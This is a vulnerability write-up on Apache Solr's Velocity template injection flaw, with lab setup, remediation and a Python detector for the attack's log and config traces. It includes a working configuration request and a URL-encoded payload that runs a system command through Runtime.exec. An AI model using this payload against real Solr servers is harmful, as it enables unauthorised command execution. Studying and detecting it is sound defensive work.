
Title: Apache Solr template injection remote code execution vulnerability


Apache Solr template injection remote code execution vulnerability

Apache Solr is a search server based on Lucene (a full-text search engine) from the Apache Software Foundation in the United States. Apache Velocity is a template engine that provides HTML page templates, email templates, and general-purpose open-source code-generator templates. In multiple versions of Apache Solr, the configuration parameters of the VelocityResponseWriter component can be set via HTTP requests; once specific parameters are set, an attacker can inject an arbitrary Velocity template and execute arbitrary commands.

Affected versions

5.0.0 <= Apache Solr <= 8.3.1

Environment setup

You can use the Solr environment from vulhub:

```shell
docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
```

Copy the jar files under contrib/velocity/lib whose names start with velocity into server/solr-webapp/webapp/WEB-INF/lib/:


Restart the solr service.

Vulnerability reproduction

Once the environment above is in place, exploiting this vulnerability takes two steps. First, set the key parameter params.resource.loader.enabled to true through an HTTP request, so that template code can be supplied directly from the user's HTTP request. Then execute arbitrary commands by supplying arbitrary Velocity template code. Since Solr does not enable authentication by default, the exploit requires no login credentials in this setup.

```json
{
  'update-queryresponsewriter': {
    'startup': 'lazy',
    'name': 'velocity',
    'class': 'solr.VelocityResponseWriter',
    'template.base.dir': '',
    'solr.resource.loader.enabled': 'true',
    'params.resource.loader.enabled': 'true'
  }
}
```


Send payload:

Visit: http://IP:8983/solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end


The response contains the output of the id command (screenshots omitted).
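From the defender's side, the two steps above leave two distinct traces: a write to the core's configuration that turns on params.resource.loader.enabled for the VelocityResponseWriter, and a select request carrying wt=velocity together with an inline v.template.custom. The following Python script is an added example (not code from the original post or from vulhub): it flags both patterns in constructed request-log lines and audits a Solr config tree for the dangerous setting. The log format and IP addresses are assumptions made for the sample.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined/Jetty request-log style (not from the post).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jan/2020:20:59:54 +0000] "GET /solr/test/select?q=1&wt=velocity'
    '&v.template=custom&v.template.custom=%23set(%24x%3D%27%27) HTTP/1.1" 200 512',
    '10.0.0.7 - - [02/Jan/2020:21:00:01 +0000] "GET /solr/test/select?q=*:*&wt=json HTTP/1.1" 200 1200',
    '10.0.0.5 - - [02/Jan/2020:20:55:09 +0000] "POST /solr/test/config HTTP/1.1" 200 40',
]

# The post's configuration update, written here as standard double-quoted JSON.
SAMPLE_CONFIG = json.loads('''{
  "update-queryresponsewriter": {
    "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter",
    "template.base.dir": "", "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}''')

def classify(line):
    """Verdict for one request-log line, or None when nothing stands out."""
    try:
        method, target = line.split('"')[1].split(' ')[:2]
    except (IndexError, ValueError):
        return None                         # not a request line we understand
    url = urlsplit(target)
    params = parse_qs(url.query)            # values are URL-decoded here
    if params.get('wt', [''])[0].lower() == 'velocity' and 'v.template.custom' in params:
        return 'inline-velocity-template'   # template text supplied in the request itself
    if method == 'POST' and url.path.endswith('/config'):
        return 'config-api-write'           # worth reviewing: may have enabled the params loader
    return None

def params_loader_enabled(node):
    """True if any VelocityResponseWriter in a config tree has
    params.resource.loader.enabled set to true (recursive walk over dicts/lists)."""
    if isinstance(node, dict):
        if (node.get('class') == 'solr.VelocityResponseWriter'
                and str(node.get('params.resource.loader.enabled', 'false')).lower() == 'true'):
            return True
        return any(params_loader_enabled(v) for v in node.values())
    if isinstance(node, list):
        return any(params_loader_enabled(v) for v in node)
    return False

def scan(lines):
    """Return (line_index, verdict) for every flagged line."""
    return [(i, v) for i, v in ((i, classify(l)) for i, l in enumerate(lines)) if v]

if __name__ == '__main__':
    print(scan(SAMPLE_LOG))                      # [(0, 'inline-velocity-template'), (2, 'config-api-write')]
    print(params_loader_enabled(SAMPLE_CONFIG))  # True
```

The config audit can be pointed at the JSON returned by a core's config endpoint as well as at a captured request body, since it walks the whole tree rather than one fixed key.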

Remediation

Upgrade to Apache Solr 8.4. Until the upgrade is done, make sure params.resource.loader.enabled stays off for the VelocityResponseWriter, and enable authentication on Solr, since it is disabled by default.
